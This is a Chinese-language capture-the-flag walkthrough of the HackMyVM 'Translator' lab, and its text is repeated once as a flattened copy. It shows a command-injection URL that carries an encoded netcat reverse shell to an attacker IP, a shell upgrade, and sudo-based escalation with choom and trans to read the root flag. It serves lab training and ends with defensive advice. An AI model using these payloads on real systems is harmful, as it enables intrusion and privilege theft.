hackmyvm系列9——translator
字数 928 2025-08-12 11:34:21

HackMyVM系列9——Translator靶机渗透教学文档

1. 靶机信息

  • IP地址: 192.168.152.155
  • 服务: Web应用(在线加密网站)
  • 难度: 中等

2. 信息收集阶段

2.1 网络扫描

使用netdiscover进行局域网主机发现:

netdiscover -r 192.168.152.0/24

2.2 端口和服务扫描

使用nmap进行详细扫描:

nmap -sV -Pn -sC -A 192.168.152.155

3. Web应用分析

3.1 功能分析

  • 访问Web页面发现是一个在线加密网站
  • 测试发现输入"aaa"得到"zzz"
  • 加密逻辑: 根据26个字母顺序倒序加密(a→z, b→y, ..., z→a)

3.2 命令注入漏洞

发现Web应用存在命令注入漏洞,可以通过管道符|执行系统命令

4. 初始访问

4.1 反弹Shell

利用命令注入漏洞建立反向Shell:

http://192.168.152.155/translate.php?hmv=aaaa|mx -x hs 192.168.152.213 6666

4.2 稳定Shell

获取交互式Shell:

python3 -c "import pty;pty.spawn('/bin/bash');"

5. 本地枚举

5.1 文件发现

在当前目录发现文件hvxivg,读取内容后发现是加密的

5.2 解密文件

使用反向字母加密解密hvxivg文件:

  • hvxivg → secret
  • 解密后得到命令cat /etc/passwd

5.3 用户枚举

查看/etc/passwd发现存在多个用户,测试发现ocean用户可以登录

6. 权限提升

6.1 检查sudo权限

sudo -l

发现可以以india用户身份执行choom命令:

sudo -u india choom -n 0 /bin/sh

6.2 获取更高权限Shell

python3 -c "import pty;pty.spawn('/bin/bash');"

再次检查sudo权限,发现可以利用任意文件读取

6.3 读取root flag

使用trans工具读取root.txt:

sudo -u root /usr/local/bin/trans -i /root/root.txt -no-autocorrect

7. 关键知识点总结

  1. 字母反向加密: 理解a→z, b→y,..., z→a的加密模式
  2. 命令注入: 通过管道符|实现命令注入
  3. 反弹Shell技术: 使用mx工具建立反向连接
  4. 交互式Shell升级: 使用Python获取完整TTY
  5. sudo权限利用: 分析sudo -l结果,利用特定命令提权
  6. 任意文件读取: 通过trans工具读取root权限文件

8. 防御建议

  1. 对Web应用输入进行严格过滤,防止命令注入
  2. 限制sudo权限,避免不必要的命令执行权限
  3. 对敏感文件设置严格的权限控制
  4. 定期进行安全审计,检查系统配置漏洞
HackMyVM系列9——Translator靶机渗透教学文档 1. 靶机信息 IP地址: 192.168.152.155 服务: Web应用(在线加密网站) 难度: 中等 2. 信息收集阶段 2.1 网络扫描 使用 netdiscover 进行局域网主机发现: 2.2 端口和服务扫描 使用 nmap 进行详细扫描: 3. Web应用分析 3.1 功能分析 访问Web页面发现是一个在线加密网站 测试发现输入"aaa"得到"zzz" 加密逻辑: 根据26个字母顺序倒序加密(a→z, b→y, ..., z→a) 3.2 命令注入漏洞 发现Web应用存在命令注入漏洞,可以通过管道符 | 执行系统命令 4. 初始访问 4.1 反弹Shell 利用命令注入漏洞建立反向Shell: 4.2 稳定Shell 获取交互式Shell: 5. 本地枚举 5.1 文件发现 在当前目录发现文件 hvxivg ,读取内容后发现是加密的 5.2 解密文件 使用反向字母加密解密 hvxivg 文件: hvxivg → secret 解密后得到命令 cat /etc/passwd 5.3 用户枚举 查看 /etc/passwd 发现存在多个用户,测试发现 ocean 用户可以登录 6. 权限提升 6.1 检查sudo权限 发现可以以 india 用户身份执行 choom 命令: 6.2 获取更高权限Shell 再次检查sudo权限,发现可以利用任意文件读取 6.3 读取root flag 使用trans工具读取root.txt: 7. 关键知识点总结 字母反向加密 : 理解a→z, b→y,..., z→a的加密模式 命令注入 : 通过管道符 | 实现命令注入 反弹Shell技术 : 使用mx工具建立反向连接 交互式Shell升级 : 使用Python获取完整TTY sudo权限利用 : 分析sudo -l结果,利用特定命令提权 任意文件读取 : 通过trans工具读取root权限文件 8. 防御建议 对Web应用输入进行严格过滤,防止命令注入 限制sudo权限,避免不必要的命令执行权限 对敏感文件设置严格的权限控制 定期进行安全审计,检查系统配置漏洞